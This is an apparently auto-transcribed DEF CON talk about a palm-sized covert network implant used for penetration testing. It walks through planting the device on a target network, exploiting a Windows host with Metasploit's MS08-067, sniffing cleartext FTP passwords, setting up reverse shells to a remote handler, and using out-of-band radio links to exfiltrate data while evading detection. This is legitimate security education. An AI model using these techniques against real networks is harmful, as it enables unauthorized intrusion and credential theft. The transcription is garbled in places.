 talk I wanted to give today is called hacker in the wire. So it's a little bit about this guy here. It's called a catch wire. And we'll tell you a little bit more about this device. But essentially it is a little computer that you can let live on your network and you can hack people do fun stuff like that. So what's this talk about? It's about a hacking device that lives on a gigabit ethernet wire and it's the catch wire. It's made by WAW technologies. And it's running Declinix. Some of you might be familiar with Declinix. I've given some talks here at Declinix before. I lied before. It's not my first time at Declinix. But I describe how you can build some of these little things. And this talk is about porting some of that stuff that I did with an eagle bone to work on this new device. So why would you want to do this? You can do multiple things with it. You can use some command and control and exfiltration using different options. You can either do things on the network, which you've installed this to. You can also remote control it using some XP radios. Talk a little bit about that. And of course you can use some other technologies such as cellular networks. So why should you care about this stuff anyway? Well, a catch wire running the Declinix is small. I mean, you can literally fit it in your palm. It's pretty flexible. And you can network it together with some other devices such as some of the eagle bone-based devices I've talked about, previous DEF CONs. And you can easily take this guy and install him a couple of places. So you could put it in your data center. So you have a client, we'll just call them the target client. And if you can get into their data center, in particular, if they have power over ethernet, you can take one of these little guys, you plug it in, and you're having lots of fun. You're getting all the packets. You might want to narrow it down a little bit more. You could put it on a LAN segment. Maybe there's only one LAN segment that's of interest to you. Of course, you could also inline a single PC if that's what you want it to do. If you can find an unused desk, slap it under there and be on their network. A little bit about me, some of you have seen me around. I'm a professor at Bloomsburg University in Pennsylvania. And I teach pentesting information security and digital forensics. Also, I've written a couple of books. This book is one of them. Hacking and Penetration Test in a Low Power Devices. And we actually have a new book that we're releasing to Pentester Academy tomorrow on Linux for instance. So that's interest to you. I've been programming since I was about eight. In assembly, since I was ten, hacking hardware, since I was around 12 or so. Also been known to fly, build planes, do some other aviation stuff. Of course, an author for Pentester Academy and some others as well. So what are we going to talk about? We're going to talk a little bit about the catch wire. What is it? What does it do? Talk a little bit about deck Linux, some of the attacks that you can do with this device or with a Beaglebone Black based device. And we'll talk about some things that you can do specific to the catch wire and some ideas for some future directions that you might want. So the catch wire. What is it? It used to be called the Luna, the little universal network appliance. They had a Kickstarter last year I believe. And they changed the name after the Kickstarter for some legal reasons. And it's essentially like the Beaglebone Black except it's got two gigabit ethernet interfaces on it. And it supports power over ethernet. And it also has a nice integrated FTBI USB to the work ship. What it doesn't have, the Beagle has is it doesn't have the HDMI output or all of the GPIO headers. So in terms of the software, it's very similar, which was something that made it very easy for me to work what I had done with the Beaglebone over to this new platform. Here's a block diagram. You can see it's got a TI processor. And if you look at this and you compare it to the Beaglebone Black, you will see that it's very similar other than having the full gigabit ethernet stuff. The board looks kind of like this. You can see it's got a couple of gigabit ethernet ports. You've got a power over ethernet pass through module. So you can go ahead and pass through the power through the device if you want or not. And that's what those headers say J1 headers are for. On the bottom of the board you have processor, memory and some other stuff as well. Including a micro SD card slot that you can use if you want to load up something like Declinix. So speaking of Declinix, what is it? Declinix is something that I made a while back and it's essentially built on Ubuntu 14.04 and it's optimized for pen testing with things like the Beagleblood, catch wire and similar things. So you can use this as a drop box or a hacking console, remote hacking drone. There's a lot of different uses for these little devices. It has over 4,000 packages pre-installed. And I will say this unlike certain other pen testing oriented distributions which I won't name, it's pretty much fluff free. It's got 4,000 packages that people actually use. Not something that someone wrote 10 years ago and no one's used it since. To that base OS I've added some extra things. I have these different modules such as the mesh deck. So the mesh deck allows you to remotely command and control these devices using XB or ZigBee mesh working. So it allows you to command and control and coordinate attacks. You can attack from up to two miles away. I've also developed the air deck. So it's a flying hacking drone. So it's a flying hacking drone that I built it on top of a quad shot if anyone is familiar with that. It's a nice flying landing platform that is shown in the picture here as well. And so I have that as another possibility. So you know, let's say you don't have good physical access, you can actually fly in your hacking hardware, land on your target's roof, hack the crap out of them, fly away. Also developed the four deck which is a forensics module that lets you do USB right blocking and things like that. And I developed something new called the U deck, the USB deck for USB based attacks. And actually that's what my other talk is tomorrow. So tomorrow I'm going to sell this as the first ever Friday night keynote presentation at DevCon. Which basically means somebody asks can we bump you to 7 p.m. on a Friday? And I said, oh, okay. I'm the only person talking at 7. If you're bored and you're not eating dinner, come by. We'll talk USB attacks. Okay, so the catch what? How are you going to power this thing? Well, if you have power over ethernet, you're golden. I mean, that's the best option ever. Just plug it in. You're good to go. As I said before, you can pass through the power using the jumpers on the device. You can also use a DC adapter. So it has a plug on the end for DC power. That's the second best option. And you can also use USB power. So there's a USB port. You can use it to power the device via a charger. If you're going to do this, you should have a 2 amp or greater charger. You can power it from a PC. So if you hook it into a PC, you can power it that way. But be careful, because normally you're limited to 500 milliamps with a USB 2.0 device. And that's not enough to power up the catch wire, a couple of gigabit ethernet ports, and maybe your alpha wireless adapter or an XB module attached to it. So how do you configure one of these guys? So if you want to do some hacking with your catch wire, all you have to do is grab the image. So I have the image hosted at my faculty page over at Williamsburg. And there's a nice little script. Just download the whole thing. And you can create a micro SD card using the provided script. You're going to need at least a 16 gig card, because it will not fit on a 8 gig card. And honestly, I'd recommend a 32 gig card, because it's a little bit tight at 16 gig. There's a lot of hacking goodness built into this. So once you've created this, if you've got a nice fast card, I recommend at least a class 10 card or faster. You can create the card in about a half hour or so, install it into the catch wire. And in order to do that, it's pretty easy. Just take the screws off from the end that has the micro USB. It pulls out, it's taking the card, and you're good to go. You can connect the PC to a PC via the USB. And you can just log in if you want to do some initial configuration as you want to. You need to do the password temp pwd and just add stuff as you need. Before you deploy it. So what does it look like? It's kind of like this. So cross your fingers, everyone. So we're going to go ahead like this. Connect to the catch wire. Before I do that, I need to set off my serial port. This is from a Ubuntu system. And I will change this to TTY, zero, no flow control. I'll plug in the device. And here we can see some of the boot sequence. Now this will take a little bit longer than the typical boot sequence if you're booting the standard version of Linux that comes with the catch wire. And the reason for that is that I am booting up the deck Linux here. And that has an awful lot of extra stuff that is coming. You can see here where it came up. And it started a bridge process that bridges the two Ethernet adapters. And here we are bringing up some additional stuff. Now I can go ahead and log in. Default log in is Ubuntu, temp pwd as displayed in the banner message. I've managed to boot deck Linux. So that's pretty easy. By the way, the first time that you boot it, it might take a little bit longer because it has to set up some stuff on the SD card. Do not write, protect the SD card. It can cause some problems. Okay, so I talked a little bit about bridging the Ethernet connections. Now that's the default on the catch wire. It'll come with some network flow monitoring software and everything pre-installed. And the kernel options are also going to have this bridge set up. But if for some reason you wanted to split it, you can and it's pretty easy. You just change to the boot, you boot DTBS directory. DTBS, if you're not familiar with these things, it stands for device tree binaries. Device tree binaries are a clever and elegant way of accounting for all the different kinds of hardware you can have on your systems, especially on base systems. And all you need to do is change that overlay, that binary that describes the device. And you just copy the DMACC version over the Luna version and comment out some lines in the UDEP rules as I indicated here. If you want to go back, you just reverse the process. You uncomment the lines and then you change it back to the Luna-switch DTB file. And it's all good to go. Something else you might consider doing, you might consider installing a mesh deck. You know, why would you want to do that? Why wouldn't you want to do that? Because it's cool, right? You can command and control slash exfiltrate some data up to two miles away without using any kinds of gateways or extenders. Of course, if you want to use a gateway, you could be on the other side of the world. If you have an exfee to internet gateway of some sort. And it's also out of band. Yes, you can use an interface on the target's network when you connect the catch wire. But people see that traffic. People don't see the traffic on the ZV, unless they're using ZV and even then they probably don't know this. Honestly. It's pretty easy to integrate your catch wire into a multi-device pen test. Or maybe you have your case full of a bunch of beautiful blacks and a few other bits of equipment. And you can use either mesh networking or ZV networking or you can use a start. And that's an easy choice to make. So to do this you just get a USB adapter. Plug in the exfee to that. Plug in the catch wire. And if you want details on that, if you go back and look at my DEF CON 21 talk. Again, I lie. It's not my first time. And you can get some more details in that talk. You can also, you know, if you had to read my book you could read it. And another nice thing about installing the mesh test, maybe there's some blacking. Maybe there's some firewalls that are going to prevent you from easily accessing that built-in interface on the target network from wherever you are. Whereas the exfee is not going to be blocked by a firewall. So it's another plus for it. So I'm going to start with an old friend. So here's it. Using an old friend, maybe using an old friend with a catch wire. So I've gone ahead and I run up Metasploit on my catch wire. And now one of the first things I want to do is just verify that I'm connected to my database, which I am. And I can go ahead and run a dbnmap. And we can see that it's finished. We should also notice that this host here, 123, looks like it has some interesting services. It's got an FTP server, an HTTP server, and some Windows file share. So it looks like we might have some interesting opportunities in order to exploit things on that machine. And of course, I can run my hosts command. I can also run my services. So now that I have my list of hosts and services, have another look at this list and find something that we might want to try to attack. So I see right here that I have a free float FTP server, which could be vulnerable, and some other things that are vulnerable as well. Well, let's start with our good old friend, good old MS 08067. So I'm going to try and run up this exploit, MS 08067. It's not a security account with NADI. It's a way to show options, set our host to 192. 168.1.123. Now I'm going to set my payload, show our payload, show our options again, and we will say our local host is here. Now we're ready to run our exploit. And there you have it. We just opened an interpreter session on a Windows machine using our old friend MS08067. I can go ahead and do a screenshot. Here we go. And all the usual medicine plate commands. All right, so, you know, it's pretty fun. You know, it's a good chunk of fun to take a little handheld device and pull Windows boxes. Maybe it's just me. So some other stuff you can do. Let's do a little bit of sniffing. I mean, obviously this is an awesome device for doing sniffing on a wired segment. So, you know, we noticed that there was an FTP server running. So let's go ahead and we will sniff some traffic. And the command we're going to use, we're just going to use a TCP dump as a particular host. So the command is TCP dump dash N and host and name the host dash B, which says, hey, please be revert for the host dash A, which says dump these pockets to ask a ASCII. Sorry, can't speak today. It's early. It's only Thursday. I haven't been drinking. And pass that to eat rep. And what we're going to look for is the user prompt where they sent their username or where they sent their password. And of course, FTP, it's all in clear text. So let's do this and try. So we have a host that's running an FTP server. We can verify that with NMAP. So if I do an NMAP on 192.168.120, which is a system that we previously identified as running FTP, we can then use the catch wire to capture all the pockets to or from the system. Again, the catch wire is installed in line to this LAN segment. So I can pretty much do whatever I want. And here we see, sure enough, yes, there is an FTP server running. So I will go ahead and run TCP dump. And I give it the dash N posts and the name or IP address. Please be verbose. And dash capital A says take all of your stuff and send it to ASCII. So give me an ASCII representation of my packets. I will pipe that to eGrab and I will look for either user in uppercase and then a space or pass in uppercase and then a space. So once I do that, it will start listening. I can go to another machine in my network and I can log in via FTP and voila. There you have it. User Joe logged in with password password one. Now one thing I should see. All right, so I'd say not bad and do we even have to write a script? It's like one line. So loads of fun. What about all of the stuff that you might want to do? What if you want to use wire shark? You can use wire shark or the catch wire as well. So something you can do is use the catch wire to capture packets and then you can send those on to wire shark. Now before you can do this however, you're going to have to let root log in. So normally root is not allowed to log in which is a good thing. So you're going to have to go in and edit a config file that allows root to log in via SSH. Now why not? Why not let root log in through SSH? Well root is a very well known user ID so then you only have to guess the password. So you can figure that one out. It's not a good idea to normally have it enabled. Another thing I will say about this. I don't do this in this demo but you should probably use some filters. Even the most clueless this admin might get a little bit suspicious if there's suddenly this doubling of traffic and it's all flowing out of his network. All right, so maybe filter it a little bit and kind of narrow that focus a little bit. So all you have to do is just SSH in. So here's the command is SSH in as root at catch whatever your catch wire address is. And then you give it something to run. TCP dump dash s zero. Capture all those packets dash w write them out dash. Please write them standard out and you pipe it to wire shark dash k which means please run right away. Dash I the interface will be dash. So you want to do some sniffing on the catch wire and have it displayed on your workstation elsewhere. So how can you do this? Well the first thing you need to do is you need to enable root to log in. The reason you need to do this is that by default root is not allowed to log in. So you need to go to the etsy ssh sshd config file and in that file you will find a line that says permit log in which I have already changed to yes. Previously it said without password. So if you wanted to set up keys it was allowable but if you wanted to use a password it was not. So now that that's been done it's quit and go ahead and show you how to run this. So on your workstation not the catch wire device. You don't need to bring up a terminal and run this command. So the command is going to be ssh root and again you want to run this as root because being prompted for a password is problematic and you need to be root in order to run tcp dump appropriately. Here's the address for my catch wire. Here I have the full path to tcp dump. I'm going to output full packets. I'm going to write them to dash which means standard out. I piped that to wire shark dash k dash k means please immediately run this dash i dash. So it's going to accept input from standard in and take that input and display it. So I'll go ahead and press enter. Notice that wire shark popped up prompted for my root password and now I'm listening. Not much is happening at this moment but as I start generating some traffic it will. So I can go ahead and I can repeat my previous demo and I'm going to go ahead and I'm going to log in to my ftp server and there we have it. I've logged in. I'm going to go ahead and stop my capture here and I'm going to do a search where my target address is 120 and what do I have here? There's a request user joe password one. So there you have it. In another way that I can sniff some traffic and in this case I'm exporting that traffic remotely to another work station. Remember. Okay so you know if that one line on the command line with that grub command was too much you don't have to write anything right? Just type the wire shark, couple filters and you can do this. Alright well that was kind of fun but I think we could have some more fun. So here's what I'm going to do in this next demo. I'm actually going to run up Metasquate on the catch wire and I'm going to use my XB connection on the catch wire to find you know services, find what's vulnerable and run up Metasquate and then I'm going to on another machine, maybe a machine back in my office that you have an intern or somebody that is back there waiting, waiting for inbound connections from my pentest and they're going to run a multi-hander and I can either have my XSquate on the catch wire that I'm going to run directly connect to them or alternatively I could drop some sort of a payload using Metasquate on the catch wire in order to do the same thing. So let's see how this works. Let's go ahead and do a demo with the catch wire that is connected to my workstation via XB or ZB networking. So I've gone ahead and installed a mesh deck add-on and I have plugged in my USB adapter which allows me to control my catch wire from up to two miles away and again another thing to keep in mind why would you want to do this? You can do this because you might be blocked by firewalls and such and in addition to that it might be very suspicious if there is suddenly a bunch of traffic flowing out of your target's network. So I'm going to go ahead and run up the mesh deck server and I've set up my catch wire to be on device three. I'll run a quick test just to make sure everything is working properly by running the dMessage again and it is. I can also check my networking with ifconfig and I can see that this device has attached itself at address 120. Again if I use this I need to be aware that I might have issues with detection from my target. Let's run nmap on a machine in this network and I can see this machine is running an FTP server, a web server and appears to be doing windows file sharing and has some other things running as well. So let's have some fun with Metasploit. We'll go ahead and we're going to run a Metasploit command and we'll just pop up a simple shell. I don't really type this fast by the way and you can also see how I fat finger stuff occasionally. So now let's have a look at another machine. I set up a multi handler. I set the payload appropriately to my reverse shell, set my parameters and I want the exploit pretty soon. I get a shell that's created. However it almost immediately dies because of some problem which is not unusual with Metasploit. Occasionally things just don't work. So I hit it again and this time I successfully created a reverse shell. I can interact with it in Metasploit and from there I can run all the various shell commands such as a quick IP config just to verify that I'm on machine that I think I am and it's connected to everything else. Alright so you know again so the exploit is being run on the catch wire that's in the network and then it's redirecting that victim machine to your multi handler that's running who knows where. Someone out on the internet, in your office, etc. I didn't do it. I didn't do a demo of this but again you could just as easily take your catch wire and drop a payload instead of saying please you started a reverse shell, a trooper shell, etc. Well here's some ideas for some other possibilities. You know I just briefly touched on using the mesh deck with the catch wire. Again if you go back to my Defcon 21 talk you can get a lot more details on that system and how that works. You might get some further ideas. You could use the mesh deck for toggling on and off. If you want to do some sniffing or you want to target your focus it could be useful for that. And hey don't just sniff, inject some packets. You know nobody says you can't do that too. You might also want to use the mesh deck to communicate things like cracked passwords to other hacking drones in your pen test. There is a facility in the mesh deck not just for running commands there's also a facility for transferring files both directions and there's a facility for sending announcements both directions. So it's pretty easy on your catch wire or your other hacking drone just to say okay please send an announcement back to the command console saying hey guess what I just hacked this password. You could also do some online password cracking with a tool like Hydra. You know I've done this I didn't have a demo for that today. You can do some other attacks. Social engineering. Social engineering is always fun. Who likes social engineering? Yeah. You know maybe add some cool stickers from your IT department. Do not touch IT. Whatever. I don't recommend hacker con stickers in order okay. You could sell it to people. It's a network extender or performance enhancer. It's going to enhance my performance as a pen tester but you not so much as a victim. So hopefully I've given you a few ideas of some of the things that you can do. Now if you do have any questions about this stuff I am doing a demo lab Saturday from noon to 2 or 1200 to 1400 if you prefer that format. Also I will be spending about a lot of time at the pen tester academy booth the security 2 booth in the vendor area. If I'm not there ask. I'll probably be around soon. And of course the best reason to stop by is to win some free stuff. Does anyone like free stuff? All right. I like free stuff too. So here's one of the cool things you can win. Actually the people at WAW are nice enough to donate not one but two of these stuffers. So in this case is first of all kudos to them. This is nice proper case. Right? They don't just like hey there's some stuff in a baggie. F1. But you know they have a catch wire in here. There's a alpha adapter in here. A couple XB pro radios in there. And don't worry there's more. I also donated a couple copies of my book to go along with it. So definitely come by security 2 registered for a chance to win that. Also I think we're going to give away a couple copies of my new Linux forensics book. That's coming out tomorrow again. Limited copies here. I will say this for those of you that are paranoid especially those of you that said you like social engineering. There will be a QR code that you can scan. There's one required question. What is your email address? It goes to me. It doesn't go to anybody else. So unless you check the other optional boxes we're not going to spam you. I just want to give you stuff. Really. It's not a social engineering attack. Anyway, thank you for coming to my talk and hope you have a good DefCon.